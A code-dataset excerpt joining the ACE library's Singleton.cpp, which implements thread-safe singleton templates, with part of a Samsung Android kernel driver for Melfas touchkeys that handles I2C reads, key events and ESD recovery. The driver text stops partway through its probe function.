* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
#include "editablestreamhistory.h"
| gpl-2.0 |
NightCotRe0110/SkyFire.548 | dep/acelite/ace/Singleton.cpp | 2 | 19514 | #ifndef ACE_SINGLETON_CPP
#define ACE_SINGLETON_CPP
#include "ace/Singleton.h"
#if !defined (ACE_LACKS_PRAGMA_ONCE)
# pragma once
#endif /* ACE_LACKS_PRAGMA_ONCE */
#if !defined (__ACE_INLINE__)
#include "ace/Singleton.inl"
#endif /* __ACE_INLINE__ */
#include "ace/Object_Manager.h"
#include "ace/Log_Category.h"
#include "ace/Framework_Component.h"
#include "ace/Guard_T.h"
#include "ace/os_include/os_typeinfo.h"
ACE_BEGIN_VERSIONED_NAMESPACE_DECL
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Unmanaged_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_TSS_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_Unmanaged_TSS_Singleton)
ACE_ALLOC_HOOK_DEFINE_Tcc(ACE_DLL_Singleton_T)
ACE_ALLOC_HOOK_DEFINE_Tc(ACE_DLL_Singleton_Adapter_T)
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
template <class TYPE, class ACE_LOCK> ACE_Singleton<TYPE, ACE_LOCK> *&
ACE_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_Singleton<TYPE, ACE_LOCK>), 0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per ACE_Singleton
// instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
if (singleton == 0)
{
#endif /* ACE_MT_SAFE */
ACE_NEW_RETURN (singleton, (ACE_Singleton<TYPE, ACE_LOCK>), 0);
// Register for destruction with ACE_Object_Manager.
ACE_Object_Manager::at_exit (singleton, 0, typeid (TYPE).name ());
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
}
#endif /* ACE_MT_SAFE */
}
}
return &singleton->instance_;
}
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::cleanup (void *)
{
ACE_Object_Manager::remove_at_exit (this);
delete this;
ACE_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
template <class TYPE, class ACE_LOCK> void
ACE_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
{
singleton->cleanup ();
ACE_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
}
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_Singleton<TYPE, ACE_LOCK> *
ACE_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
template <class TYPE, class ACE_LOCK> ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>),
0);
}
}
return &singleton->instance_;
}
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
{
singleton->cleanup ();
ACE_Unmanaged_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
}
template <class TYPE, class ACE_LOCK> void
ACE_TSS_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_TSS_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
template <class TYPE, class ACE_LOCK> ACE_TSS_Singleton<TYPE, ACE_LOCK> *&
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_TSS_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_TSS_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
template <class TYPE, class ACE_LOCK> TYPE *
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance");
ACE_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_TSS_Singleton<TYPE, ACE_LOCK>), 0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per ACE_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
if (singleton == 0)
{
#endif /* ACE_MT_SAFE */
ACE_NEW_RETURN (singleton, (ACE_TSS_Singleton<TYPE, ACE_LOCK>),
0);
// Register for destruction with ACE_Object_Manager.
ACE_Object_Manager::at_exit (singleton, 0, typeid (TYPE).name ());
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
}
#endif /* ACE_MT_SAFE */
}
}
return ACE_TSS_GET (&singleton->instance_, TYPE);
}
template <class TYPE, class ACE_LOCK> void
ACE_TSS_Singleton<TYPE, ACE_LOCK>::cleanup (void *)
{
delete this;
ACE_TSS_Singleton<TYPE, ACE_LOCK>::instance_i () = 0;
}
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i (void)
{
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
template <class TYPE, class ACE_LOCK> TYPE *
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance");
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>),
0);
}
}
return ACE_TSS_GET (&singleton->instance_, TYPE);
}
template <class TYPE, class ACE_LOCK> void
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::close (void)
{
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *&singleton =
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::instance_i ();
if (singleton)
singleton->cleanup ();
}
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_TSS_Singleton <TYPE, ACE_LOCK> *
ACE_TSS_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
template <class TYPE, class ACE_LOCK>
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK> *
ACE_Unmanaged_TSS_Singleton<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
/*************************************************************************/
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance.
template <class TYPE, class ACE_LOCK> ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::singleton_ = 0;
#endif /* !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES) */
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dump (void)
{
#if defined (ACE_HAS_DUMP)
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dump");
#if !defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
ACELIB_DEBUG ((LM_DEBUG, ACE_TEXT ("instance_ = %x"),
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ()));
ACELIB_DEBUG ((LM_DEBUG, ACE_END_DUMP));
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
#endif /* ACE_HAS_DUMP */
}
template <class TYPE, class ACE_LOCK>
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i");
#if defined (ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES)
// Pointer to the Singleton instance. This works around a bug with
// G++ and it's (mis-)handling of templates and statics...
static ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *singleton_ = 0;
return singleton_;
#else
return ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::singleton_;
#endif /* ACE_LACKS_STATIC_DATA_MEMBER_TEMPLATES */
}
template <class TYPE, class ACE_LOCK> TYPE *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&singleton =
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ();
// Perform the Double-Check pattern...
if (singleton == 0)
{
if (ACE_Object_Manager::starting_up () ||
ACE_Object_Manager::shutting_down ())
{
// The program is still starting up, and therefore assumed
// to be single threaded. There's no need to double-check.
// Or, the ACE_Object_Manager instance has been destroyed,
// so the preallocated lock is not available. Either way,
// don't register for destruction with the
// ACE_Object_Manager: we'll have to leak this instance.
ACE_NEW_RETURN (singleton, (ACE_DLL_Singleton_T<TYPE, ACE_LOCK>),
0);
}
else
{
#if defined (ACE_MT_SAFE) && (ACE_MT_SAFE != 0)
// Obtain a lock from the ACE_Object_Manager. The pointer
// is static, so we only obtain one per
// ACE_Unmanaged_Singleton instantiation.
#if defined(ACE_FACE_SAFETY_BASE)
static ACE_LOCK the_lock;
static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_DLL_Singleton_T<TYPE, ACE_LOCK>),
0);
}
//ACE_REGISTER_FRAMEWORK_COMPONENT(ACE_DLL_Singleton<TYPE,ACE_LOCK>, singleton);
ACE_Framework_Repository::instance ()->register_component
(new ACE_Framework_Component_T<ACE_DLL_Singleton_T<TYPE, ACE_LOCK> > (singleton));
}
return &singleton->instance_;
}
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&singleton =
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ();
delete singleton;
singleton = 0;
}
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close_singleton (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close_singleton");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close ();
}
template <class TYPE, class ACE_LOCK> const ACE_TCHAR *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dll_name (void)
{
return this->instance ()->dll_name ();
}
template <class TYPE, class ACE_LOCK> const ACE_TCHAR *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::name (void)
{
return this->instance ()->name ();
}
/**********************************************************************/
template <class TYPE> const ACE_TCHAR*
ACE_DLL_Singleton_Adapter_T<TYPE>::dll_name (void)
{
// @todo make this a constant somewhere (or it there already is one
// then use it.
return ACE_TEXT("ACE");
}
ACE_END_VERSIONED_NAMESPACE_DECL
#endif /* ACE_SINGLETON_CPP */
| gpl-2.0 |
sktjdgns1189/android_kernel_samsung_SHW-M130L | drivers/input/keyboard/melfas-touchkey.c | 2 | 20185 | /*
* Driver for keys on GPIO lines capable of generating interrupts.
*
* Copyright 2005 Phil Blundell
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/i2c.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/sched.h>
#include <linux/pm.h>
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include <linux/delay.h>
#include <linux/platform_device.h>
#include <linux/input.h>
#include <mach/regs-gpio.h>
#include <plat/gpio-cfg.h>
#include <asm/gpio.h>
#include <linux/miscdevice.h>
#include <asm/uaccess.h>
#include <linux/earlysuspend.h>
#include <asm/io.h>
#include <mach/gpio.h>
#include <mach/gpio-aries.h>
#ifdef CONFIG_CPU_FREQ
#include <mach/cpu-freq-v210.h>
#endif
/*
Melfas touchkey register
*/
#define KEYCODE_REG 0x00
#define FIRMWARE_VERSION 0x01
#define TOUCHKEY_MODULE_VERSION 0x02
#define TOUCHKEY_ADDRESS 0x20
#define UPDOWN_EVENT_BIT 0x08
#define KEYCODE_BIT 0x07
#define ESD_STATE_BIT 0x10
/* keycode value */
#define TOUCHKEY_KEYCODE_MENU 158
#define TOUCHKEY_KEYCODE_BACK 28
#define I2C_M_WR 0 /* for i2c */
#define IRQ_TOUCH_INT (IRQ_EINT_GROUP22_BASE + 1)
#define DEVICE_NAME "melfas-touchkey"
#define INT_PEND_BASE 0xE0200A54
#define MCS5000_CHIP 0x93
#define MCS5080_CHIP 0x90
#define MCS5000_last_ver 0x38
#define MCS5080_last_ver 0x30
// if you want to see log, set this definition to NULL or KERN_WARNING
#define TCHKEY_KERN_DEBUG KERN_DEBUG
extern unsigned int HWREV;
static int touchkey_keycode[3] = {NULL, TOUCHKEY_KEYCODE_MENU, TOUCHKEY_KEYCODE_BACK};
static u8 activation_onoff = 1; // 0:deactivate 1:activate
static u8 is_suspending = 0;
static u8 user_press_on = 0;
static u8 touchkey_dead = 0;
static u8 menu_sensitivity = 0;
static u8 back_sensitivity = 0;
static u8 version_info[3];
static void __iomem *gpio_pend_mask_mem;
struct i2c_touchkey_driver {
struct i2c_client *client;
struct input_dev *input_dev;
struct work_struct work;
struct early_suspend early_suspend;
};
struct i2c_touchkey_driver *touchkey_driver = NULL;
struct workqueue_struct *touchkey_wq;
static const struct i2c_device_id melfas_touchkey_id[] = {
{"melfas_touchkey", 0},
{}
};
MODULE_DEVICE_TABLE(i2c, melfas_touchkey_id);
extern void get_touchkey_data(u8 *data, u8 length);
static void init_hw(void);
static int i2c_touchkey_probe(struct i2c_client *client, const struct i2c_device_id *id);
struct i2c_driver touchkey_i2c_driver =
{
.driver = {
.name = "melfas_touchkey",
},
.id_table = melfas_touchkey_id,
.probe = i2c_touchkey_probe,
};
static int i2c_touchkey_read(u8 reg, u8 *val, unsigned int len)
{
int err;
int retry = 3;
struct i2c_msg msg[1];
if((touchkey_driver == NULL)||touchkey_dead)
{
return -ENODEV;
}
while(retry--)
{
msg->addr = touchkey_driver->client->addr;
msg->flags = I2C_M_RD;
msg->len = len;
msg->buf = val;
err = i2c_transfer(touchkey_driver->client->adapter, msg, 1);
if (err >= 0)
{
return 0;
}
printk(KERN_ERR "%s %d i2c transfer error\n", __func__, __LINE__);/* add by inter.park */
mdelay(10);
}
return err;
}
static int i2c_touchkey_write(u8 *val, unsigned int len)
{
int err;
struct i2c_msg msg[1];
unsigned char data[2];
if((touchkey_driver == NULL)||is_suspending||touchkey_dead)
{
return -ENODEV;
}
data[0] = *val;
msg->addr = touchkey_driver->client->addr;
msg->flags = I2C_M_WR;
msg->len = len;
msg->buf = data;
err = i2c_transfer(touchkey_driver->client->adapter, msg, 1);
if (err >= 0) return 0;
printk(KERN_ERR "%s %d i2c transfer error\n", __func__, __LINE__);
return err;
}
extern unsigned int touch_state_val;
extern void TSP_forced_release(void);
void touchkey_work_func(struct work_struct * p)
{
u8 data[5];
int keycode;
int retry = 10;
if(!gpio_get_value(_3_GPIO_TOUCH_INT) && !touchkey_dead)
{
get_touchkey_data(data, 5);
if((data[0] & ESD_STATE_BIT)|(data[3]>=45)|(data[4]>=45)) // ESD state or abnormal sensitivity
{
is_suspending = 1;
printk(KERN_ERR "touchkey ESD_STATE_BIT set\n");
if(user_press_on==1)
{
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_MENU, 0);
printk(TCHKEY_KERN_DEBUG "ESD release menu key\n");
}
else if(user_press_on==2)
{
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_BACK, 0);
printk(TCHKEY_KERN_DEBUG "ESD release back key\n");
}
user_press_on = 0;
while(retry--)
{
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
gpio_direction_output(_3_TOUCH_SDA_28V, 0);
gpio_direction_output(_3_TOUCH_SCL_28V, 0);
msleep(300);
init_hw();
if(i2c_touchkey_read(KEYCODE_REG, data, 3)>=0)
{
printk(TCHKEY_KERN_DEBUG "touchkey ESD init success\n");
enable_irq(IRQ_TOUCH_INT);
is_suspending = 0;
return;
}
printk(KERN_ERR "i2c transfer error after ESD, retry...%d",retry);
}
touchkey_dead = 1;
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
gpio_direction_output(_3_TOUCH_SDA_28V, 0);
gpio_direction_output(_3_TOUCH_SCL_28V, 0);
printk(KERN_ERR "touchkey died after ESD");
return;
}
else
{
keycode = touchkey_keycode[data[0] & KEYCODE_BIT];
}
if(activation_onoff){
if(data[0] & UPDOWN_EVENT_BIT) // key released
{
user_press_on = 0;
input_report_key(touchkey_driver->input_dev, keycode, 0);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "touchkey release keycode: %d\n", keycode);
}
else // key pressed
{
if(touch_state_val == 1)
{
printk(TCHKEY_KERN_DEBUG "touchkey pressed but don't send event because touch is pressed. \n");
}
else
{
if(keycode==TOUCHKEY_KEYCODE_BACK)
{
TSP_forced_release();
#ifdef CONFIG_CPU_FREQ
// set_dvfs_target_level(LEV_800MHZ);//set to comment temporarily by mseok.chae 2011.01.11
#endif
user_press_on = 2;
back_sensitivity = data[4];
input_report_key(touchkey_driver->input_dev, keycode,1);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "back key sensitivity = %d\n",back_sensitivity);
printk(TCHKEY_KERN_DEBUG " touchkey press keycode: %d\n", keycode);
}
else if(keycode==TOUCHKEY_KEYCODE_MENU)
{
user_press_on = 1;
menu_sensitivity = data[3];
input_report_key(touchkey_driver->input_dev, keycode,1);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "menu key sensitivity = %d\n",menu_sensitivity);
printk(TCHKEY_KERN_DEBUG " touchkey press keycode: %d\n", keycode);
}
}
}
}
}
else
printk(KERN_ERR "touchkey interrupt line is high!\n");
enable_irq(IRQ_TOUCH_INT);
return ;
}
static irqreturn_t touchkey_interrupt(int irq, void *dummy)
{
disable_irq_nosync(IRQ_TOUCH_INT);
queue_work(touchkey_wq, &touchkey_driver->work);
return IRQ_HANDLED;
}
#ifdef CONFIG_HAS_EARLYSUSPEND
static void melfas_touchkey_early_suspend(struct early_suspend *h)
{
is_suspending = 1;
if(user_press_on==1)
{
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_MENU, 0);
printk(TCHKEY_KERN_DEBUG "%s release menu key\n",__func__);
}
else if(user_press_on==2)
{
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_BACK, 0);
printk(TCHKEY_KERN_DEBUG "%s release back key\n",__func__);
}
user_press_on = 0;
if(touchkey_dead)
{
printk(KERN_ERR "touchkey died after ESD");
return;
}
disable_irq(IRQ_TOUCH_INT);
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
gpio_direction_output(_3_TOUCH_SDA_28V, 0);
gpio_direction_output(_3_TOUCH_SCL_28V, 0);
}
static void melfas_touchkey_early_resume(struct early_suspend *h)
{
if(touchkey_dead)
{
printk(KERN_ERR "touchkey died after ESD");
return;
}
gpio_direction_output(_3_GPIO_TOUCH_EN, 1);
msleep(100);
//clear interrupt
if(readl(gpio_pend_mask_mem)&(0x1<<1))
writel(readl(gpio_pend_mask_mem)|(0x1<<1), gpio_pend_mask_mem);
enable_irq(IRQ_TOUCH_INT);
is_suspending = 0;
}
#endif // End of CONFIG_HAS_EARLYSUSPEND
extern int mcsdl_download_binary_data(u8 chip_ver);
//extern int mcsdl_download_binary_file(unsigned char *pData, unsigned short nBinary_length);
static int i2c_touchkey_probe(struct i2c_client *client, const struct i2c_device_id *id)
{
struct device *dev = &client->dev;
struct input_dev *input_dev;
int err = 0;
